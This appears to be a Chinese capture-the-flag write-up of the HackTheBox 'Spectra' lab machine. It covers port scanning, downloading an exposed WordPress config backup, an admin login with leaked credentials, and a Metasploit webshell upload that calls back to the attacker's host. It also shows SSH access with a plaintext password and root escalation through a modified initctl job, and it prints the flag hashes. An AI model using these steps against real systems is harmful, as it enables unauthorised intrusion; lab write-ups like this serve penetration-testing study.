0x01信息收集
端口扫描:
nmap -A -sS -sV -sC 10.10.10.229
发现开放80,22,3306端口,使用浏览器访问80端口web服务
0x02 目录遍历
有一个页面包含两个超链接(翻译:在IT设置Jira之前,我们可以配置并使用它进行问题跟踪。)点击两个链接,发现都访问不了,我猜可能跟上一题一样,要把IP地址解析到域名上去:
echo "10.10.10.229 spectra.htb" /etc/hosts
然后访问链接后发现是个wordpress的默认模板页面,点来点去并没有发现什么东西
点来点去也没有什么明显的东西,点击第二个页面
显示数据库没有连接,然后浏览目录的时候发现列出来了一些文件
看到wp-config.php.save文件,看起来是配置文件,我们下载下来试试:
wget http://spectra.htb/testing/wp-config.php.save
然后看到一些数据库连接配置
尝试使用数据库的用户名和密码登录wp的后台
发现报Unknown username错误,我们尝试用Administrator这个用户名和密码devteam01登录下,发现成功登录
然后我们可以通过msf生成一个webshell,适用于wp的模板shell,通过更换模板方式去把webshell传上去
use exploit/unix/webapp/wp_admin_shell_upload //使用此expset rhosts 10.10.10.229 //设置目标主机set lhost 10.10.14.4 //设置本机IP地址set username administrator //设置登录用户名set password devteam01//设置登录密码set targeturi /mainexploit
然后获得msf会话,然后getshell,并且升级shell
使用cat /etc/passwd查看有哪些用户,发现有个katie用户
然后查看home目录下的文件,发现有个katie文件夹
ls -al /home/katie
发现/home/katie目录下有个user.txt,cat之后发现受到nginx用户的限制,我们必须切换成katie用户才能查看。先找到katie用户的密码,首先我们看的第一个地方是/opt目录:
看到一个autologin.conf.orig文件很可疑,cat一下看看。
这是一个脚本文件,通过脚本可知,一直是指向/etc/autologin目录,发现这个目录下有个passwd文件,我们可以看到密码:SummerHereWeCome!!
我猜是某个登录密码,一开始不是扫描到了SSH的22端口,可以试下是不是SSH的密码。
连接成功!根目录下找到user flag:
e89d27fe195e9114ffa72ba8913a61300x03 提升权限
使用sudo -l查看当前能使用root特权的文件。发现/sbin/initctl文件不需要密码也可以执行,但是我不清楚这个文件是做什么的
google查了一下,initctl是作为系统来控制启动和停止的过程,看起来可以执行根shell的好方法。首先我们看看/etc/init
发现目录下有好多个文件。看起来text.conf系列的文件比较可疑。查看一下
看起来katie用户比较忙,我们可以通过自己的代码替换内容,以便可以用root权限运行
sudo initctl list | grep test //显示test中的会话作业
可以看到test是停止状态,使用vim编辑,提权至sudo执行bin/bash
保存后重新使用initctl命令开启test并且执行/bin/bash
sudo /sbin/initctl start test/bin/bash -p
成功获得root shell,在/root/root.txt获得root flag:
d44519713b889d5e1f9e536d0c6df2fc
本文始发于微信公众号(暗魂攻防实验室):【渗透测试】hackthebox靶场之Spectra
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论